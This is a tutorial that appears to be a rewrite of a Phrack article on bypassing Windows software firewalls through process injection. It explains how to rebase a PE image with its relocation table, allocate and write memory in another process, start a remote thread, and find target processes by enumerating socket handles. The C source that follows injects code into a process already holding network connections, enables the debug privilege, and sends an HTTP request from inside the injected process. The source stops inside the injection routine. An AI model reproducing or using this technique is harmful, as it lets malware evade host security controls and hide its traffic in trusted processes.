Bypassing software firewalls using process infection
Introduction
Before we start: as most of you know, this article will probably be (and probably should be) overshadowed by rattle's article of the same title (http://www.phrack.org/show.php?p=62&a=13). I have chosen to recreate it firstly because a lot of people have found it difficult to comprehend, and secondly because I've come across some improvements of my own worth adding.
It seems most of the difficulty is with the use of relocatable assembly code. While this is all 1337, all the same reasons for not using it pop up. Most of us sort of learn to read/write it, but it's never been as clear or expandable as an HLL. With some neat tricks, the computing underworld has circumvented the issue. I'll try to explain it in a way that you guys (and I) can understand.
A quick walkthrough of things you’ll probably need to know
Like I said, this is a quick walkthrough; there are probably gigabytes of this crap on the interweb. It applies to win32 as it is now, and probably to modern memory management across most OSes.
If you are a cool cat you can probably just use this for reference.
Processes in memory
Processes are (virtual) address spaces that have executable code (that may or may not be currently executed). Modules are executables or libraries loaded into this address space; basically anything in PE format. Threads are a way to split execution of a process into parallel streams of instructions, usually independent of each other.
There are 4 types of address, and we will only ever see 3 of them. The first is an actual physical address; we can forget about this one, as our operating system handles it. The second is an absolute address (as defined in a process space) that references a tangible address in that particular process space. That is, we don't need to do anything to it to make it point to the correct place. The third is a virtual address; this doesn't really exist, other than to make our lives easier. It points (as an absolute address) to the base of the current module, which is how we can calculate the absolute address of an RVA. A relative virtual address (or RVA) is defined as the absolute address minus the virtual address. If this sounds a little complicated, it is. I like to think of RVA as Relative _to_ _the_ Virtual Address. The goal of RVAs is to avoid hard coded addresses, or at least minimise their irreparable use. This brings us onto why we need them, and the windows loader.
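To make the arithmetic concrete, here is a minimal sketch of the two conversions described above. The helper names are my own (they are not in the source code at the end), and a 32-bit address space is assumed, as in the rest of the article.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helpers for illustration only; 32-bit addresses assumed. */

/* RVA -> absolute address: add the base the module is loaded at. */
static uint32_t rva_to_absolute(uint32_t module_base, uint32_t rva)
{
    return module_base + rva;
}

/* Absolute address -> RVA: subtract the module base again. */
static uint32_t absolute_to_rva(uint32_t module_base, uint32_t absolute)
{
    assert(absolute >= module_base); /* the address must not lie below the base */
    return absolute - module_base;
}
```

So for a module loaded at 0x00400000, the RVA 0x1000 refers to the absolute address 0x00401000, and the same RVA stays valid wherever the module ends up; only the base changes.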
The windows loader
The windows loader has a simple purpose: it must fetch the file off the disk and make it work in memory. This sounds pretty simple, and in most cases it is. Its first step is to create the address space and put the primary module (usually the executable you click) into memory. It then looks for any dependencies this executable has: libraries it needs, like ws2_32.dll and probably/definitely kernel32.dll. Modules have preferred load addresses, and at the start all their in-code addresses will be absolute (or hard coded) addresses that assume this load address. So what happens if there is a collision? Well bummer, the module needs to go somewhere else. This means that all hard coded addresses need to be changed, which is easy because (after ripping it off COFF) PE format has a section usually called .reloc, which contains RVAs to the hard coded addresses that need to be changed in the event of a collision. Now the reason executables usually have this stripped is that they are always loaded first, and so are certain to get their preferred load address. This is why dll injection works: the LoadLibrary() call pushes the windows loader to sort out the module's code, most likely using the .reloc table in the process.
Therefore our goal is basically to emulate the windows loader, in order to execute our module in another process space. It's important to note that this isn't _all_ the windows loader does, but it's what is important to us for this article.
Brief PE format
Now this will be really brief; it would be quite easy to waffle on into irrelevancy on this subject. To gain a (more) complete overview of PE format (and some other neat stuff) you should check the URLs/references for Matt Pietrek's article(s) on PE format.
The first structure is an IMAGE_DOS_HEADER. This is of little interest to us, other than that it has a pointer (an RVA) to the IMAGE_NT_HEADERS structure. This is important because we need to jump over a small stub program that tells DOS users to get with the freakin' times. The IMAGE_NT_HEADERS structure is plural for a reason: it actually contains two other structures, the IMAGE_FILE_HEADER, which we won't really need, and the IMAGE_OPTIONAL_HEADER (which isn't optional). The IMAGE_OPTIONAL_HEADER has lots of pretty stuff in it, including the data directory. If you need to check you're in the right place, IMAGE_NT_HEADERS also has a member called Signature, which should always be "PE\0\0".
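As a rough illustration of that sanity check, the sketch below walks from the DOS header to the NT headers in a raw byte buffer. It avoids windows.h so it can be read anywhere; the function names are hypothetical, and the only layout facts relied on are the "MZ" magic at offset 0, the e_lfanew field at offset 0x3C and the "PE\0\0" signature.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 32-bit value one byte at a time. */
static uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: returns the offset of the NT headers inside
   `image`, or 0 if the buffer does not look like a PE image. */
static uint32_t find_nt_headers(const unsigned char *image, size_t size)
{
    uint32_t lfanew;

    assert(image != NULL);
    if (size < 0x40)                          /* the DOS header is 64 bytes */
        return 0;
    if (image[0] != 'M' || image[1] != 'Z')   /* DOS magic */
        return 0;
    lfanew = read_le32(image + 0x3C);         /* e_lfanew */
    if (lfanew > size || size - lfanew < 4)   /* signature must fit in the buffer */
        return 0;
    if (image[lfanew] != 'P' || image[lfanew + 1] != 'E' ||
        image[lfanew + 2] != 0 || image[lfanew + 3] != 0)
        return 0;                             /* Signature is not "PE\0\0" */
    return lfanew;
}
```

With real headers you would simply cast the module base to PIMAGE_DOS_HEADER and read the members by name; the byte-level version is only here to show what is being checked.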
The data directory is what we need to find first. It is an array of 16 IMAGE_DATA_DIRECTORY structures, and contains the addresses (RVAs) of sections in the PE file. Sections can contain code, relocations, resources and almost anything you can imagine. In short, we need to find the .reloc section. We do this by using a predefined index called IMAGE_DIRECTORY_ENTRY_BASERELOC (or 5). From this we can get to the .reloc (or base relocations) section. Remember, not all executables have this! You'll need to get your compiler to output it (with MSVC, pass /FIXED:NO in the linker switches).
This brings us to the base relocations section, which is laid out like this: a series of blocks that each correspond to a page in memory. Each block lists the memory locations in its page that need to be altered. We calculate the change ourselves :).
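The block layout can be sketched as follows. The struct mirrors IMAGE_BASE_RELOCATION from winnt.h (a page RVA and a block size, followed by 16-bit entries); the struct and function names here are my own, and the buffer is assumed to hold the raw .reloc data in the machine's native (little-endian) byte order.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same layout as IMAGE_BASE_RELOCATION in winnt.h. */
typedef struct {
    uint32_t VirtualAddress; /* RVA of the page this block covers */
    uint32_t SizeOfBlock;    /* header plus all 16-bit entries, in bytes */
} BaseRelocBlock;

/* Hypothetical helper: counts the 16-bit entries across every block. */
static size_t count_reloc_entries(const unsigned char *reloc, size_t reloc_size)
{
    size_t pos = 0, total = 0;

    assert(reloc != NULL);
    while (reloc_size - pos >= sizeof(BaseRelocBlock)) {
        BaseRelocBlock blk;
        memcpy(&blk, reloc + pos, sizeof blk);
        if (blk.SizeOfBlock < sizeof blk || blk.SizeOfBlock > reloc_size - pos)
            break;                        /* malformed or terminating block */
        total += (blk.SizeOfBlock - sizeof blk) / sizeof(uint16_t);
        pos += blk.SizeOfBlock;           /* the next block starts right after */
    }
    return total;
}
```

The point to take away is that SizeOfBlock includes the 8-byte header, so the number of entries in a block is (SizeOfBlock - 8) / 2.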
How software firewalls work
Software firewalls work by hooking API calls, usually as a driver. They then dictate who shall and shall not be permitted to use them, usually by some use of checksums and tables of who the user has allowed.
Our idea is to "hide" in another process's space that has the privileges to access the internet, which in turn allows us to bypass the firewall. The act of injecting your code into another process's address space is called process infection (hence the title :). This usually happens without the application(s) knowing they have been infected.
Process infection without external dll or 1337 code
Right so, down to the mechanics. I've split this up into stages, partly because it makes it easier, and partly because it just divides up nicely. (As a quick reminder of what we're doing: we want to put our code in another process, and fix up all hard coded addresses using the .reloc section.)
First
We need to get some space (anywhere we can, it doesn't matter) in the other process. This is quite a complicated issue, as it appears only partially abstracted by windows, but, well, whatever; we need to do it anyway. We can allocate ourselves a series of pages (if you don't know what pages are, don't worry. It's just memory to you and me) using the VirtualAllocEx() API. This takes 5 arguments, most of which I'll assume you understand, or can understand from the manual on msdn.microsoft.com. The points that are specifically important to us are: passing NULL as the specified address (this allocates us memory anywhere it's available), and the protection values/allocation type. The protection value should be set to PAGE_EXECUTE_READWRITE, which allows us to do everything we want, and the allocation (or reservation) type needs to be MEM_COMMIT | MEM_RESERVE.
The value that we are returned will be the new base address for our module. We must convert all absolute addresses to reflect that fact. That's a catch to remember, as things become a little complicated when dealing with multiple regions of memory.
Second
For this bit we'll need to know the size of our module (or the module to be injected). This can be found either using some of the module enumeration APIs, or by traversing our own IMAGE_NT_HEADERS struct and finding the SizeOfImage member in the IMAGE_OPTIONAL_HEADER struct. With this we need to make a copy of ourselves, so we don't damage our own execution. To allocate memory, I like to use HeapAlloc(), if only for the reason that there is an option to complain on error. Now you'd better CopyMemory() our module memory over into our newly allocated region :) This copy is where the module that needs to be changed lives, but it is _not_ the address it needs to be rebased to, which is the address from the first step.
Third
This is where the actual rebasing procedure begins and ends. To find the .reloc section (I've briefly covered this before, but here it is more programmatically), we need to find the DOS header. This is the base of the module (that we copied). From this, get e_lfanew (which is an RVA) and add it to the base of the module to get a pointer to the NT headers. The source code has a handy macro (which has been abused so much I don't know who to credit it to) for adding an integer to pointers without interference.
The absolute address of the .reloc table can then be found via the IMAGE_OPTIONAL_HEADER/DataDirectory structure(s). Somewhat like this: OP_HEADER.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress plus the absolute address of the copied module. And yes, it is an RVA, not _the_ virtual address. Grunt.
The size of this section is also included in the same place, which is useful because we'll need to iterate through the blocks. For each block, the entries are words. The upper 4 bits indicate the type of relocation, which will be either IMAGE_REL_BASED_ABSOLUTE or IMAGE_REL_BASED_HIGHLOW. Ignore IMAGE_REL_BASED_ABSOLUTE, as it is used as padding. The lower 12 bits are an offset from the block's virtual address (an RVA, as above) to the hard coded address. To calculate exactly how much you need to add to the hard coded address (otherwise known as the delta), subtract the preferred image base from the actual new address for the module. Add the delta to the value pointed to by the above offset from the block's (relative) virtual address. Continue this until you have looped through all the blocks. I think the source code shows this a little better than my fumbling English. :)
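For anyone who prefers to see the bit twiddling in isolation, here is a small sketch of fixing up one block inside a local copy of an image. It is not the routine from the source code below; the function name and parameters are made up for the example, and the two type constants carry the same values as their IMAGE_REL_BASED_* counterparts in winnt.h.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REL_BASED_ABSOLUTE 0  /* same value as IMAGE_REL_BASED_ABSOLUTE */
#define REL_BASED_HIGHLOW  3  /* same value as IMAGE_REL_BASED_HIGHLOW  */

/* Hypothetical helper: applies one block's entries to a local copy.
   page_rva is the block's VirtualAddress, delta is
   (new base - preferred base). Returns the number of addresses patched. */
static unsigned apply_block(unsigned char *image, size_t image_size,
                            uint32_t page_rva, const uint16_t *entries,
                            unsigned count, uint32_t delta)
{
    unsigned i, patched = 0;

    assert(image != NULL && entries != NULL);
    for (i = 0; i < count; i++) {
        unsigned type   = entries[i] >> 12;      /* upper 4 bits */
        uint32_t offset = entries[i] & 0x0FFFu;  /* lower 12 bits */
        size_t   where  = (size_t)page_rva + offset;
        uint32_t value;

        if (type != REL_BASED_HIGHLOW)
            continue;                            /* ABSOLUTE is only padding */
        if (where > image_size || image_size - where < sizeof value)
            continue;                            /* entry points outside the copy */
        memcpy(&value, image + where, sizeof value);
        value += delta;                          /* unsigned wrap handles a lower new base */
        memcpy(image + where, &value, sizeof value);
        patched++;
    }
    return patched;
}
```

As a worked example: with a preferred base of 0x00400000 and a new base of 0x00A50000 the delta is 0x00650000, so a hard coded 0x00401234 becomes 0x00A51234.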
And finally
Write the rebased module to the other address space using WriteProcessMemory(). After this, all that needs to be done is to call CreateRemoteThread() on the new module (you should also be able to manipulate the thread context if CreateRemoteThread() is hooked). The entry point can be a (rebased) address from your module, or the AddressOfEntryPoint member in the optional header. Gold! (quite a lot of debugging later!)
Known Issues
Well, with the correct permissions this idea will be able to infect any process; however, we're not completely correctly emulating the windows loader. No doubt it performs many tasks that, at this stage, we just don't need to emulate. For example, the IAT could contain the wrong addresses if libraries have been loaded in different places, possibly causing an unidentified catastrophic error at runtime. Fix that with your own black magic :)
Beating hooks on CreateProcess(), and a different method of finding trusted processes
Many firewalls today hook CreateProcess(), which catches out rattle's original method of launching an invisible browser to communicate. My method involves reading active TCP connections and the processes that host them. If we find one, we jack it.
We could do this by calling the GetExtendedTcpTable() API with AF_INET as the 'ulAf' parameter, indicating that we would like only IPv4 connections, and TCP_TABLE_OWNER_PID_CONNECTIONS as the table class. This should give us a list of active connections along with their owning pids to infect. If for any reason one should fail, we can simply move onto the next one in the list. It sounds simple enough; the trouble is, GetExtendedTcpTable() (according to its documentation) was only just included in XP SP2. Other similar functions were only just included in XP. Our search for gingerbread missionaries continues.
After digging around, I can't find a documented way of uncovering network connections pre-XP. I have found, however, that using NtQuerySystemInformation() along with some undocumented stuff, we can enumerate all open handles in the system. We can then bring the handles into our address space using DuplicateHandle(), and so query their information (namely the device they are using) using NtQueryObject(). We can then filter for handles using "\Device\Tcp". At this point we could go further and query the device for information such as connection endpoints, connection states and port numbers. I feel that this would just further complicate an issue already far too complex; if they have an open handle to a socket, and we can read it, I assume that they are a viable target. To combat the idea that, well, man down, my code includes some "continue until you're safely there" features that, well, you're all intelligent enough to understand and enjoy without me talking about it.
Conclusion
This method is different to most I've seen around. At this point, if English were not my native language, I would be making some excuses for any inadequacies in the way I have written. But it is, so check the source code for anywhere you get lost. I've tried to keep it commented, in the hope it might catch on.
Vale!
Source code
/* MAIN.C ---------------------*/
/* contains WinMain, base of app */
#include <windows.h>
#include <winsock.h>
#include <stdio.h>  // sprintf
#include <stdlib.h> // malloc, realloc
#include <string.h> // strlen
#include "dmode.c"
#include "pInject.c"
#include "FindSocketHandles.c"
unsigned long InjectedFuncState; // global to notify the process injector of the injector func state
unsigned long LastEntryInjected = 0;
#define FUNC_INCOMPLETE 1 // a list of states InjectedFuncState can be
#define FUNC_SUCCESS 0
#define FUNC_FAILURE -1
#define FUNC_CONNECT_FAILURE -2 // important enough for its own code
/* some crap for our injected function */
typedef int (WINAPI *WSASTRT)
(WORD, LPWSADATA);
typedef SOCKET (WINAPI *SOKT)
(int, int, int);
typedef unsigned long (WINAPI *INET_ADR)
( const char* );
typedef unsigned short (WINAPI *HTNS)
( unsigned short );
typedef int (WINAPI *CNNCT)
(SOCKET, const struct sockaddr*, int);
typedef int (WINAPI *SND)
(SOCKET, const char*, int, int);
typedef int (WINAPI *CLSE_SCK)
(SOCKET);
typedef int (WINAPI *WSACLEAN)
();
/* more precisely crap so we can dynamically load winsock */
#define WSK_SENDSTR "GET /scripts/index.php?scan=hello%20from%20me HTTP/1.0\nFrom: Darth_Vader\nUser-Agent: Force/1.0\n\n"
int InjectedMeat(LPARAM lParam)
{
// we can make any in-modular calls in the other process space here
// beware of inter-modular calls, as they may have been located in different
// places. this is why i've loaded winsock dynamically
HMODULE hWinsock2;
SOCKET mySock;
WSADATA wsa_data;
struct sockaddr_in RemoteAddrInfo;
WSASTRT MyWSAStartup;
SOKT MySocket;
INET_ADR MyInetAddr;
HTNS MyHtons;
CNNCT MyConnect;
SND MySend;
CLSE_SCK MyCloseSocket;
WSACLEAN MyWSACleanup;
InjectedFuncState = FUNC_INCOMPLETE;
hWinsock2 = LoadLibrary("ws2_32.dll");
if (hWinsock2==NULL)
{ InjectedFuncState = FUNC_FAILURE; ExitThread(-1); }
// at this point we assume it is all there, expect to die horribly if not
MyWSAStartup = (WSASTRT)GetProcAddress(hWinsock2, "WSAStartup");
MySocket = (SOKT)GetProcAddress(hWinsock2, "socket");
MyInetAddr = (INET_ADR)GetProcAddress(hWinsock2, "inet_addr");
MyHtons = (HTNS)GetProcAddress(hWinsock2, "htons");
MyConnect = (CNNCT)GetProcAddress(hWinsock2, "connect");
MySend = (SND)GetProcAddress(hWinsock2, "send");
MyCloseSocket = (CLSE_SCK)GetProcAddress(hWinsock2, "closesocket");
MyWSACleanup = (WSACLEAN)GetProcAddress(hWinsock2, "WSACleanup");
if(MyWSAStartup(MAKEWORD(2,0), &wsa_data)!=0)
{
InjectedFuncState = FUNC_FAILURE;
WinMain(NULL, NULL, NULL, 0);
ExitThread(0);
}
mySock = MySocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(mySock==INVALID_SOCKET)
{
InjectedFuncState = FUNC_FAILURE;
WinMain(NULL, NULL, NULL, 0);
ExitThread(-1);
}
ZeroMemory(&RemoteAddrInfo, sizeof(struct sockaddr_in));
RemoteAddrInfo.sin_family = AF_INET;
RemoteAddrInfo.sin_addr.s_addr = MyInetAddr("192.168.0.2");
RemoteAddrInfo.sin_port = MyHtons(80);
if(MyConnect(mySock, (struct sockaddr *) &RemoteAddrInfo, sizeof(RemoteAddrInfo)) < 0)
{
InjectedFuncState = FUNC_CONNECT_FAILURE;
WinMain(NULL, NULL, NULL, 0);
ExitThread(-1);
}
MySend(mySock, WSK_SENDSTR, strlen(WSK_SENDSTR), 0);
MyCloseSocket(mySock);
MyWSACleanup(); // WSACleanup takes no arguments
InjectedFuncState = FUNC_SUCCESS;
ExitThread(0);
return 0;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nShowCmd)
{
int ret;
DWORD cbNeeded, dwRandIndex;
POPEN_SOCK_HANDLE_INFO_EX pOSHIEx;
char debugout[255];
pOSHIEx = malloc(1);
DebugMode(TRUE); //checking
FindPIDsWithSocketHandles(pOSHIEx, 1, &cbNeeded);
// sorry about the names here people, i kind of ran out of inspiration
pOSHIEx = realloc(pOSHIEx, cbNeeded);
// should probably check these
FindPIDsWithSocketHandles(pOSHIEx, cbNeeded, &cbNeeded);
// don't pass null for that last param, you'll probably crash 'n' burn
// note: you can check the return values here
// anything positive is a success - the number above zero indicates warnings
dwRandIndex = 1 + LastEntryInjected;
if (dwRandIndex > pOSHIEx->NumberOfEntries-1)
{
//we've probably used all our processes
MessageBox(NULL, "CatastrophicError!", "PJECT", MB_ICONWARNING); //
ExitThread(0);
}
LastEntryInjected++;
sprintf(debugout, "injecting pid %d from %d poss", pOSHIEx->OpenSockHandleInfo[dwRandIndex].dwPid, pOSHIEx->NumberOfEntries);
MessageBox(NULL, debugout, "INFO", MB_OK);
ret = pInject(GetModuleHandle(NULL), pOSHIEx->OpenSockHandleInfo[dwRandIndex].dwPid, &InjectedMeat, GetCurrentProcessId());
switch (ret)
{
case PINJECT_MEM_ERR:
MessageBox(NULL, "THERE WAS A MEMORY ERROR", "FUCK", MB_OK);
break;
case PINJECT_RELOC_ERR:
MessageBox(NULL, "THERE WAS A RELOC ERROR", "FUCK", MB_OK);
break;
case PINJECT_PROC_ACCESS_ERR:
MessageBox(NULL, "THERE WAS A PROCESS ACCESS ERROR", "FUCK", MB_OK);
break;
case PINJECT_NO_RELOC:
MessageBox(NULL, "YOU IDIOT. NO RELOC TABLE", "FUCK", MB_OK);
}
return 0;
}
/* dmode.c ---------------- */
/* contains DebugMode() to activate the debug privilege */
#ifndef SUCCESS
#define SUCCESS 0
#endif
#ifndef FAILURE
#define FAILURE 1
#endif
// DebugMode (BOOL)
// with occasionally a tongue in cheek reference as god mode =)
// activates the debug mode for the current process
// requires the privilege to be 'ENABLED'
// returns FAILURE on failure, and SUCCESS on success
int DebugMode(BOOL bToggle)
{
HANDLE hToken;
DWORD cbTokPriv = sizeof(TOKEN_PRIVILEGES);
static TOKEN_PRIVILEGES tpGodModeActivated, tpOriginalMode;
if (bToggle)
{
tpGodModeActivated.PrivilegeCount = 1;
tpGodModeActivated.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tpGodModeActivated.Privileges[0].Luid);
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken) )
{
return FAILURE;
}
// AdjustTokenPrivileges returns a BOOL: zero means the call failed
if (!AdjustTokenPrivileges(hToken, FALSE, &tpGodModeActivated, sizeof(tpGodModeActivated),
&tpOriginalMode, &cbTokPriv))
{
CloseHandle(hToken);
return FAILURE;
}
CloseHandle(hToken);
}
else {
if (! OpenProcessToken(GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken) )
{
return FAILURE;
}
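// AdjustTokenPrivileges returns a BOOL: zero means the call failed
if (!AdjustTokenPrivileges(hToken, FALSE, &tpOriginalMode, sizeof(tpOriginalMode), NULL, NULL))
{
CloseHandle(hToken);
return FAILURE;
}
CloseHandle(hToken); // don't leak the token handle on success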
}
return SUCCESS;
}
/* pInject.c ---------------- */
/* functions related to process injection */
// pInject;
// contains functions related to process injection
// namely pInject ( DWORD dwPid, void* startAddress, DWORD dwAdditionalInfo)
// startAddress. Now that's a tough one !
// we will need to rebase that as well
// TODO:
// also fix IAT and other issues with relocatable code
// not a problem unless dlls are loaded in different places to in our address space
// if this is a problem (and this code hasn't been updated. now=9/6/2006)
// use GetProcAddress (assuming that's in the right place!)
#define PINJECT_SUCCESS 0
#define PINJECT_MEM_ERR -1
#define PINJECT_RELOC_ERR -2
#define PINJECT_PROC_ACCESS_ERR -3
#define PINJECT_NO_RELOC -4
#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr) + (addValue) )
// http://www.codeproject.com/dll/DLL_Injection_tutorial.asp
// actually from a book by matt pietrek and whored out over the internet
int pInject(HANDLE hModule, DWORD dwInPid, void* pStartAddr, DWORD dwParam)
{
HANDLE hOtherProcess;
void *pNewModule, *pModuleAsData, *pBaseForRVA;
WORD *wRelocRVAs;
PIMAGE_DOS_HEADER pDOSHeader;
PIMAGE_NT_HEADERS pNTHeader;
PIMAGE_BASE_RELOCATION pBaseReloc;
unsigned int i=0, j=0, nRelCount=0, offset;
DWORD dwModSiz, dwWritten=0, dwMemDelta, dwBaseRelocSiz, *pAbsoluteRelocAddr, dwRelocSecOffset;
// open the process
hOtherProcess = OpenProcess(PROCESS_ALL_ACCESS,